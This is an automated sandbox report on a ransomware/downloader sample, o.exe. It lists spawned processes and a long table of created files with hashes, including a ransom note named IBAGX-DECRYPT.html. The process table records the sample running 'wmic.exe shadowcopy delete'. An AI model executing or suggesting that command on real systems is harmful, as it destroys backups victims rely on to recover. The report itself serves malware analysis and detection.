d77378dc...c8d0 | Grouped Behavior
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader, Ransomware

d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0 (SHA256)

o.exe

Windows Exe (x86-32)

Created at 2018-09-24 10:34:00

Notifications (2/3)

Due to a reputation service error, no query could be made to determine the reputation status of file hashes.

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The operating system was rebooted during the analysis.

Monitored Processes

Process Overview
| ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID |
| --- | --- | --- | --- | --- | --- | --- |
| #1 | 0x9fc | Analysis Target | High (Elevated) | o.exe | "C:\Users\EEBsYm5\Desktop\o.exe" | - |
| #3 | 0xb10 | Child Process | High (Elevated) | wmic.exe | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | #1 |
| #11 | 0x4 | Kernel Analysis | System (Elevated) | System | - | - |
| #13 | 0xe0 | Child Process | System (Elevated) | smss.exe | \SystemRoot\System32\smss.exe | #11 |
| #14 | 0xec | Child Process | System (Elevated) | autochk.exe | \??\C:\Windows\system32\autochk.exe * | #13 |

Behavior Information - Grouped by Category

Process #1: o.exe
| Information | Value |
| --- | --- |
| ID | #1 |
| File Name | c:\users\eebsym5\desktop\o.exe |
| Command Line | "C:\Users\EEBsYm5\Desktop\o.exe" |
| Initial Working Directory | C:\Users\EEBsYm5\Desktop\ |
| Monitor | Start Time: 00:01:49, Reason: Analysis Target |
| Unmonitor | End Time: 00:04:04, Reason: Self Terminated |
| Monitor Duration | 00:02:15 |
OS Process Information
| Information | Value |
| --- | --- |
| PID | 0x9fc |
| Parent PID | 0x5ac (c:\windows\explorer.exe) |
| Is Created or Modified Executable | True |
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
Thread IDs
Region
Created Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm 0.75 KB MD5: c30f7c451f90e4542386f657f17a5ccd
SHA1: a3a70f40cd384bfb8257b21e4e560b29c8c29fe7
SHA256: 2faca9452f7336aaf91b820386e2251b0f50d9f2d46e6b1f6ef2a317bb02899f
SSDeep: 24:e1SFs8TFfyRNTkEkW6lhI+rAp9FY/gLIiKQO/:eEFs85u2EkW6l7ru8KK7/
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\b652534aebe43ee746cbc40ead5a6d17_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb 0.57 KB MD5: 04dc1c6221d635bf9c29eb1e6c8c1c15
SHA1: 7d7b77f284f1b071eea40baf53d0ed12c66fa662
SHA256: 48ef1b1da9290c33fde2a12a1c54dc6b10fedb110d120fbd57d0952116d0d8d4
SSDeep: 12:Xz+stIF3YxbgoTsdm2rTqUIpkD7JlgxbWC:D43Yxmdm2rTqVgfg97
False
C:\Users\EEBsYm5\AppData\Roaming\eybr.mp3 22.89 KB MD5: 707f84ec045133943b88addc931ff046
SHA1: d691d0adfa1e71a0d817d881ed74ecbb10b94e25
SHA256: 80a782a5110284ff7fa15736c8c617a55d290ea9a7964b1368cb294ccd43e56a
SSDeep: 384:0ul6a9Al1rOWjiqSEVnMXWBZgI9LySxLBC4FvScQnvd9m6wCJ2UOMgibADvlcjg9:l6ug1rOqVPVnSWDgItTXZvQXwC7OMgpF
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl 1.29 KB MD5: ca3fadf17a6cd05514e1bca65be2eeb8
SHA1: bd65cc62485579dccb3c884a40580642573b9d35
SHA256: e7e8e61d310b44d74719b88ad6faceb4299b0bc8f13a643295252b80fc274ae4
SSDeep: 24:GtuzM4T1KQx/bnOX2NPTQHISWBX1e2/0IZAJv59931j/B9UL3OkP:GtYM4TIQxCXckHlWW2/9wv5911j/Bue+
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm 0.76 KB MD5: 20fda93e224c1c9f93fb807a9aadc67b
SHA1: db4050e6573ccf241b9253e4c4ce76ee75107b01
SHA256: d336fc9e79ff7b9c20f66f5d19401169161fdb712c8257c2eb1b5146372cb3cc
SSDeep: 12:cbV9KSL+0bjA0te/K4vAg9Z3zSOHRM+w3WZdkBo1qqNxr5zYFsGZosr76AEC:YV8S0+4vA8jRM+70BWdraFV606O
False
C:\Users\Default\ntuser.ini 0.55 KB MD5: ea6c61a5e8d2449aeea082799e749211
SHA1: 8ba381c1483fd0c59d7995191c3182c36af9ff09
SHA256: 2d3d187bda08daa4cc4f617aa9bd697683317e599af9bc1e59b76f6cbf789d71
SSDeep: 12:ktd18ueIB0pFCWvHiBjAXskLRnkhV+PR4/8KfiNpKEzmwC:ktd1B+p1H08lLoV+Z03KbA
False
C:\Users\EEBsYm5\AppData\Roaming\40id.mkv 85.66 KB MD5: 856439921529ebb1d7f736c769066ecf
SHA1: 2d32e39201c68edd8c40cc05e8a176db62f0649c
SHA256: 35f6d579bd1c90b715afa45e91c99eaee024b9042778003ce1ee36c7eeeebb85
SSDeep: 1536:xSNQBpo7YKEXDyI0EFuDRsU+OFmab+s3Ot/TPKb9T3XesIGF1jeI7kjj:E4poMKpoFuOU+O8U+LjKpSsIM1jek2j
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm 0.78 KB MD5: 7f2a95721a46c7768c2794fca7818f48
SHA1: 789405bd1ddf8c39502bf4d8b270c7e62b1bfbc2
SHA256: b76e5e5f76e9e1d70977ffc2547aca875ae528de16184d4a5025975662e71c8c
SSDeep: 12:UZM2N7dNN6DTW/RAg2OsUFCrWMtIi3eU7Z+22sF+ZO/acQFdjG+xcuTdipwXwjBE:H2v/yW/RHsDrqctJEZQhQbS+C4dja6gc
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms 28.53 KB MD5: 4f871b7f359d21d75e6193e46cfce088
SHA1: 67a5b73f22897f6b191e8e6794323269b544086d
SHA256: 3a5657f6715cf8c1e99eca21e33129d9922ee4fca896146627a3dd06effa760a
SSDeep: 768:pCFSUtWGRZoPqS1jVMckq6e1m6tln25zxugNztAEl:BUt3oPqSgcv6ell2xQgBtAEl
False
C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url 0.66 KB MD5: 5281a5e5f8e21d04ac3b83f929703cb7
SHA1: 078b9c631e460b2d8a374dfac0336cd7c2e60370
SHA256: 5046b4df6aa15549cd81ae9e074f1b75c90eef1617205183f383d509ef3349a0
SSDeep: 12:TulgZlnh2qhqhqRst1f0UoWzzp+iaMYjVXenDWLRQeafH5fmay7j9J4cxC/6C:TuKlnh2nhFttospzanjVOD+qTfH9u7j0
False
C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url 0.66 KB MD5: 11690206385ef412171fc9b751182ffb
SHA1: fa05cd02291c1dc05178d73d3d800a96415bb75d
SHA256: 0dc9ef51cfb826568a3366bd1f545999f71e1f23a45170eec68d510d3ec051c1
SSDeep: 12:FooavJunFEqoe232EZTrgkcSJdVlpkSXK8NtwumLZTxCusC:moavgnFloe232UVlpTPNtyLZrV
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg 2.40 KB MD5: 09ef80e93c8e178155ea88ad8c64fa77
SHA1: a7c78ffaca70ba8e7e2a279391cdd40bbb6e1d5f
SHA256: adcf7c8500d27dd586d38a6cf8960cffb89e488cdfa77f8d69d9b9af825b9087
SSDeep: 48:xcKfmfB3YvFKXCHrhbaYHZhKMwKohvEMHxWqNcVV6zIQz96hWqQJ5Yy1:ynovkXCLdnK42MQWqNcyzIi4I5Jd
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js 0.54 KB MD5: eff5a840cafee9119e5ba935c62427ff
SHA1: a2df7e77cf5d93f87a9aa415347e7b9c604739aa
SHA256: 68e8f63cb0a382702074c047abb9d685b6b6d274c2641892a786f868a0474aa0
SSDeep: 12:NF4Y1BqAjfIFd81Ty6Ksd7wsZZUGk77F7EwSomHY5/GlwU0FQC0C:Q6qAjAx6KsdEzhEwxmeGlwtFQCt
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm 0.75 KB MD5: fa4b52b42785d48b1970a6a47d5d95dc
SHA1: 18ba77b16b354ee8c92e5f5a8bf5738b3748404c
SHA256: d8a1c1033b272de4a7b5232f57299ceaadfa0e07e7f6a89dc42650ec84e9c85a
SSDeep: 12:FRJ/JDmadmJhWsUTX1gBfwiY2fo/5iuvmz9dURaf/rE4Y5kF5M2Szv/Gn0C:F/kJhoXXiYlhiuO3Uor7Y5kU1zH2
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount 1.18 KB MD5: 647400c8c615ae0bbae0e66c050be1f0
SHA1: 09dce00ae65f4ad81080b707c9fee1e37303ea26
SHA256: 896719eabf24e89d64c45108b87e81abab56995076b177adeb41bf12ab9d55d7
SSDeep: 24:4gvfNLLc06qjR7Q4B/3ekrj3pWsPxedQqloh4ew59eI7X0iWJ7BhtLVy:FL59OE3JPEVp9NYldLI
False
C:\Users\EEBsYm5\AppData\Roaming\D1Mcqgb3FDTv-8KryA5.jpg 76.34 KB MD5: b64ce85a92d617b4f4328943dc3b48c5
SHA1: e2ebb9614f7b396d3d5346959a9972f4fce1958e
SHA256: 8b081bb255dd3eb8b27f1569b888f4dfe5cdcf638b073ba1872f48b76a3e8e65
SSDeep: 1536:tm++TKTJjKDi+wLf2arHIeEtt6tayYqGMuLBF9mDTv5oifoo1puu:tm+eKTJjgi9JWekiKifR9
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb 66.93 KB MD5: a178bb3757271532807198ae2034ccb7
SHA1: 094fbe05113d6587fbedb2f2ee0074c9f7b7af52
SHA256: d142124d24eaba937b648e9582f3af09534450cc8d1783c88f2fe84ac4d6bd15
SSDeep: 1536:JHaIdIfg2I2m0uCqxb5UeETrYhs3zSnKLrS0cuv/QyPx1MFmwHfP8d:JHu6muCgcXIs3zS4201/QQIFmwHfP2
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl 1.78 KB MD5: f175bf1a56bdb6a0c89fb960230a6b4a
SHA1: 841fd7583648c9a970be8ead983b1ff980d21158
SHA256: c1e50ae901167d88f2f27f7d9c136550c5834c7b292daf8c40de0402eb058712
SSDeep: 48:Fxl+CG53BjVcYhFgCjOF+cUGzKKUKBTvtUtQVN+n9g:FVkgoxj5uRpvyQH+n9g
False
C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url 0.66 KB MD5: 40e308e76be72564f8c265dc0b2153e6
SHA1: eaa55eb11bf4fb85bb37afc548e47bebd5a6a6cb
SHA256: 7cf95aa1b97b0869b71db4f538f254017c448d2e46d40e06b596083c44270b6d
SSDeep: 12:WPCGUswQNA91l17aEEiARE/PVxerxdjaMMwws2PkCmtt1AJoMgXEC:WCubNymRi6E/P7e15aMMyWmtt1AJnu
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg 6.78 KB MD5: c12c774292b6211dfe0763918af2988e
SHA1: 7304255c5af276980b2f711cff597c07d672bc79
SHA256: e18af46741c1fe541e96c40cac4ef4075410d042e966bf92fd809b9578d03c6e
SSDeep: 192:AoTcfKF1Fh1TsYkaR+qgrmfMS1XzFtg0GN5E2wxQ:3ofes3Ewm1l//GN5EBQ
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm 0.75 KB MD5: 31a98a74dc566525eabae64752ca46e7
SHA1: 078d36536d10b5cfa161f15bc929557867ac0581
SHA256: 80bab6ebd122e3ebb91302d6d1b26ee97c2d59ee9fa15f3e447da0172349e6aa
SSDeep: 24:J6UwmnEWRgYHqnnAlNpwuiftTm4d2Mc0Nb9Jm4O:lwmnEWRAnypwuiBO0o
False
C:\Users\Default\Favorites\MSN Websites\MSN Sports.url 0.66 KB MD5: 531e543609937064983dbfd399932bcc
SHA1: 6cff70cc115a906e9f7c462028840e1a350ee79e
SHA256: a53cfbbc14aadf0980c488b9e7c9bf64dfd22213fd2fb737509ab8bb4036132d
SSDeep: 12:A3t8Zt/tJknJhAmJktenqzqEn3UCAtpnzCxUs0bhW4SqK7b8EJzjgOEre9+EC:Ad8Zt/sJho2RpnWx6uJmre9+d
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms 28.53 KB MD5: a25e8ba722ddc612bebe7b591223ff0f
SHA1: acb3eb40e04c39377622bba55e7e7da9ab884813
SHA256: d5b2f55728973c220dad3c90d4b3273f7e7becfe5d54f2695c64e70f59e5553f
SSDeep: 768:WFNgpIrrSXybyWtgZks0peYCAkkl6T7EJkAsnul9JBe5OYdGsEOP:Wr4IGybUms0pxzk+VJkAP9JCXdz7
False
C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi 3.02 MB MD5: 2b9909fdea8fb580e0c902e462edf41c
SHA1: bb18f05acab12df6032256cbdec702cf9756efe8
SHA256: ce281434c12f290cc1c7704e41c2612b3fa186d017f288524f895067f7255da4
SSDeep: 24576:ugeknX9XKzyKUzyWWEUiNaKc9XJOwgcac8F1NEG369+PPdllBH/ve:uge0xKzyLzgAaXXY1NL36ipB/W
False
C:\Users\EEBsYm5\AppData\Roaming\H5WuKLQ 4 uu.mp3 56.22 KB MD5: 2a70304bd3d0fd0693b06f22b4564874
SHA1: 68abe7904868e796c5ce1b590da5da5df06d3321
SHA256: ea00449016e83af1963007638e6ddca14fbf2257720b76c1acc1306e3da4e076
SSDeep: 1536:zDlhPR/mf/5QDRuZvNU8slIRZhxd+u69USXuBDyfd:zDlFR6RtZVUPiPoU5yfd
False
C:\Users\Default\NTUSER.DAT.LOG1 193.53 KB MD5: 054149c493abea88d289f13678dc9bb3
SHA1: 0555e80f8a32375fcbccebe6e3a146ee442110fd
SHA256: cb68aea295249d60de6f8bde255772b4d617dadbbd2ac366da114ca4825e6989
SSDeep: 6144:CA8ViETAJXHwOabkATBDSlYo8JDNoMabFHVkkNa:6/u3ikGBDRo8NNolbFHVzs
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\index.dat 32.53 KB MD5: 3ae587e40a62bed97be33469e4749f40
SHA1: 1206d98147da7db758e46ac0365b2068a9fc6c0d
SHA256: 3d00c1362d92540499969f1a6d04b653ad8784f5f43a89449460bb731a39405e
SSDeep: 768:Uc9KyMRgx8WZnzSEm5nix9H2RAOnUdKldvc1yeZOeAN0a73a2Lvn2ezggOv:UGKyMo8czk5nsWeGU6dsyBeAXv2Yg7v
False
C:\\IBAGX-DECRYPT.html 63.77 KB MD5: 8c17ae2a4e8a386a93ef05f02821fbc4
SHA1: 0cad8851350065189f2ad048f765cb1575f6d60d
SHA256: d20c370aef35e65e75007b601f53e87de2a33f653b3aa6bf68ee7848746eab10
SSDeep: 384:No/7cdfUSQwGYZVI/IT9cGQ+aCB0I+iH+wUWjRLW/tydFl7gPE2VvegZuH2d9:Ne
False
C:\Users\EEBsYm5\AppData\Roaming\jEsyH8xMpokXjc mOu0.ods 63.59 KB MD5: edb811df3dea650e368e9b651a6a9184
SHA1: 976c0805c5063a2e73f176320380e396b913377d
SHA256: 23183ad9b75dd9f0cf0302cdf3f3c78a98ab09063474d5904bc5b6fdac8a94f6
SSDeep: 1536:LGh8IV5U823Vj3XPTD2Ef+bKZLJiVmBI/mgtgU:LGqI/Uv3VbTD2ySOLJiQYgU
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl 1.58 KB MD5: 4785b7b937059add40873186c78da206
SHA1: 2787a1e36de189e5f1ea4feaa3ff24ce61e622ae
SHA256: 602d52626f38d7b252170c0b14d8154321c1ac54046493c2b6a49afd69749847
SSDeep: 48:lVp0QpTgERlw1kvXhp8rFZWg6myivOMrRZ1ROlyB:mQWUwqPLUZWTgvOkfOli
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb 1.02 MB MD5: 759147dff1d103e4f37c451d20afb32d
SHA1: 4624b632f13d6c568f7019b60e9242dcc1c5d3df
SHA256: 613c601b4601fd8c0e6a7118661f2b3e92019f5b102b4e403f3f5e76a3491202
SSDeep: 24576:YSPlJfsvYCs6i7DsMLpTuMaeGHwL8P8huJqbVpmKI8jHR:YElJfQNa7DsMLpgHwL82/hjx
False
C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url 0.66 KB MD5: e834abb851ad70b73d96c7d3f80d8861
SHA1: e78d9db42842489f633dce85d96f357f451238fc
SHA256: f8be6489a346497d9d2df6895b92b96aa3f71c458e1bdfef2301bcba8443188e
SSDeep: 12:MVXF+mfZOLnBcr2jb7nogdz6GvWcsa9QXL8/YKCIeOnhYMAsX0C:S5oo2H7nZV6AqM8mhYRsXt
False
C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat 32.53 KB MD5: fb971a91b0f824a8f3eed9d2f1a0da47
SHA1: 9541de218d6d7463a9538f40d06b70ddc4fe4116
SHA256: 0b45b6105d597481a5377513b992d6337e648a311ce9a0c32c505b5300ef3724
SSDeep: 768:8N1skyyHLcpfNhFv49S/YSxAcWK5dk9QiDK9v6n0:2TIpmAA+AcVvkPqk0
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl 1.55 KB MD5: 14d44a791b667848a60c6416e8e2184a
SHA1: 74a8ca16ec8ce6cc5e42aff51b4dd3ed8eecd161
SHA256: e6cd0ef2d4976605e234163f25414006fcfd911fd85723fb5d4e28a51062c0ee
SSDeep: 24:43BznA3zBeLYYeVFhKGLwc7/ScPGQ10zdvdVnijCtN6Ora/IBKCXuxRZl+XO62FR:azhLYYe/Y+waxPGQm9nxpgCORP2O6YR
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore 2.02 MB MD5: 196c53d5bec2b1543186a01c430d87ac
SHA1: 2b66308da8a93d784da9040440b1dc0389511d4a
SHA256: f519cc6497eef1b721d8fdafd6263a4a4f89303986bb34b8c078c649956dba3b
SSDeep: 24576:oXDD8PQSkf/8obA3h+R12xkb2L++c0oTFDurAwigWN:OSbItA+DskbkZpoTlIXi5N
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url 0.66 KB MD5: 9cd88b374f86257b7f7470ef294da5bc
SHA1: fc11f82fffd3aae354eba1fab8659b1a5c84e348
SHA256: a7bf0040241354f85517c2d9de8623091b9c4418754fde2199781fd8aff043de
SSDeep: 12:7bLpx1/fqeqgRMJklOHocjPEOPG+k01o8dj5H49lUoilZBKYus5qFvZfe387Vw0C:XLr1/M/1IYNk0C2q9lUP8Y+vF7Q
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm 0.76 KB MD5: dcea0afa183d29732fa2c7a088ec95ab
SHA1: 0b097632c02c7099ce62a2e45995dedaf898ca34
SHA256: f8acaf6ce09a0ea669f69468d469f5826d4cb7627987810c2de20ab7bc971789
SSDeep: 12:uN3I82QjtUMkYlUYQlvzsWbVpOZOhKCtuDbSiSyX+AfjdHS9FeyyoayJORckK3ZC:QIC5C7zsaAZOzASNWjyLyNgO6kKw
False
C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log 0.63 KB MD5: c3584fc08cee9060a3d9e598430be647
SHA1: 89703490dfbcc4675b1dab42d121b029fab1c89c
SHA256: 892cc2087d18c329f17bafbef274f85319011cd901048d3b48600878afb33b69
SSDeep: 12:lhnMSc3HYk2aGBMT0KGXAAmJOyKN3Bj6yYyAuGrhb5z8DsukYOBtrx8O3NcC:lhgok2actfAo/Bjd+zBR8DeY81x39l
False
C:\Users\EEBsYm5\AppData\Roaming\D4hFvv-xbwD80n_k.mp3 69.36 KB MD5: a5a4129912e9564e3be3bcb1af32ec3f
SHA1: 0d7c9e20d22487943c0a0992aa7d9297e9e4913f
SHA256: 6c51b6af01ecb0c7cc2ec54d57f84db27f0e26a20b431df46b2a5cf81a88f9d1
SSDeep: 1536:opE89ZekWkl2yZnNYFXBtVK69akpqLIpXtukZST0rEMzag:opTQkkyZn2FXjr9LpqsdtuwSi
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm 0.75 KB MD5: 455ba2fa50e8a383a2a057a3e3e6155d
SHA1: 477a409464633254ba13e8dcb5cee1078f41c25c
SHA256: 4addb9ed87bbf24fbbca0624ed7c81875b7d57a46bf72948b898d0e2785fc366
SSDeep: 12:jPLlsKtOAaj7GybmR4r/vjOkN8QCNmVLdodLNMEtxyk5a9HChiWjc5SC:jLgDiG7vCkN8pNmVLuwcxyPB3Xx
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg 4.65 KB MD5: 7d5480e07788cd9010dabbff1669a6e2
SHA1: 068424719033bd5df5e53bbfb265157ea3fe7524
SHA256: 2d1684aab91586b76d91663f99370d604962868df99ffdd52ac62601c2f80687
SSDeep: 96:ZsKlrRaOCE/gD+lsp7aIG3x8lVxs3ZRU8DpfennXMyu0FdZ3bPn+sanbpd:GkruylhtxCVx4ZBpfen8KbZrPn+vd
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url 0.66 KB MD5: 206e667224c1717de0f052eaa3588a71
SHA1: 2e6e0d087d9566198c51765afd3da88cfd23c403
SHA256: 48f46f586f1edc0675a0c69f824cc6beef1e53691638fbc0391ca3bcc5d75d10
SSDeep: 12:LzC7wwswpSuHMr22AwnZT7EWbN/PLUeT1E3oRD6d8B9D8vWzvIGhOjlCC:K7FxpSuHU2KZT7EWJ7Ze37wIX
False
C:\Users\EEBsYm5\AppData\Roaming\iaG_GkHNHdnzSAk_0f.avi 49.27 KB MD5: 8e738dbdc24b8dda784c5714d3afa8a7
SHA1: 3ef14211ceef313e36e63cd0315f80062fe70cce
SHA256: 9df25a7ff0228df01029b66958668982f114c7b1b0ca4ed88d7aa47c6863de19
SSDeep: 1536:a6ekNk5bjEHrA9m/HqXu7EEi6bE48+halab0:8IkVELA9m/H97EEi4j0
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg 1.58 KB MD5: 17f06d07bf929d4bed7af1c6f2c2f05c
SHA1: 4d81ee399067f36a163ab365cf2aeea139a705da
SHA256: 82e80a283feb8493fa9709a586b9df293ba149fb8403908549b19f4faee7eb45
SSDeep: 48:ltKoDhdsGLCRRkoTPRwnGsMe0G+H5rQKmUsi8h9GrUaepP:7KKdnCRRkoTPL9eMHBJSErUa0P
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl 1.52 KB MD5: cf453a97102743d3378816bdd47c0e40
SHA1: 80c615dfca15f61814b6877f20e90caa0ba819c5
SHA256: a2e95e104cfe60923d26bca185c234c495a9680f842ef9026c85c2748b33caf4
SSDeep: 48:oihkrMA3O1ZhzykkhDTdqo2+kBrH7MpJWKP:3hklS/khDUr+0oJrP
False
C:\Users\Default\Contacts\Administrator.contact 67.31 KB MD5: b7ff1843a78c41bbbac5103f6e985e4d
SHA1: c1ab89f100e691ae952c04bc41d70ee31565e374
SHA256: 059759c37f45a5afb39056d9d2460d1fd045f40fed6625737d607d4ccad78a8a
SSDeep: 1536:MReYumf8vkzcUyt1BgXQgpX2ye37LwP1yC2noAoyfX:MkYu+8LUYLUQ2mfwIZoy/
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg 10.85 KB False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\hh.dat 8.92 KB False
C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim 10.00 MB False
C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a 97.23 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl 1.54 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl 1.53 KB False
C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms 7.03 KB False
C:\Users\EEBsYm5\AppData\Roaming\k34HcmsYrEK4_.bmp 15.71 KB False
C:\Users\EEBsYm5\AppData\Roaming\Cav7r34AQxz266BdGIX.m4a 2.09 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl 1.78 KB False
C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf 25.21 KB False
C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp 66.22 KB False
C:\Users\EEBsYm5\AppData\Roaming\g-uvZ0afpQw.avi 7.96 KB False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata 5.80 KB False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\id[1].xml 0.61 KB False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\Global.MPT 382.03 KB False
C:\Users\EEBsYm5\AppData\Roaming\CmR7tOD7XC.avi 37.43 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log 2.00 MB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs 2.00 MB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl 1.10 KB False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST 0.55 KB False
C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url 0.66 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat 16.53 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm 0.76 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg 7.86 KB False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred 0.55 KB False
C:\Users\Default\Favorites\MSN Websites\MSN Money.url 0.66 KB False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms 512.53 KB False
C:\Users\Default\Favorites\MSN Websites\MSN Autos.url 0.66 KB False
C:\Users\Default\Favorites\MSN Websites\MSNBC News.url 0.66 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount 2.00 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount 2.22 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML 10.48 KB False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf 64.53 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl 1.57 KB False
C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms 28.53 KB False
C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol 0.81 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm 0.76 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log 2.00 MB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg 6.76 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl 1.31 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs 2.00 MB False
C:\Users\Default\Favorites\Links\Web Slice Gallery.url 0.75 KB False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl 37.35 KB False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url 0.66 KB False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\83aa4cc77f591dfc2374580bbd95f6ba_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb 0.57 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD 1.01 KB False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\id[1].xml 0.61 KB False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl 1.76 KB False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg 23.84 KB False
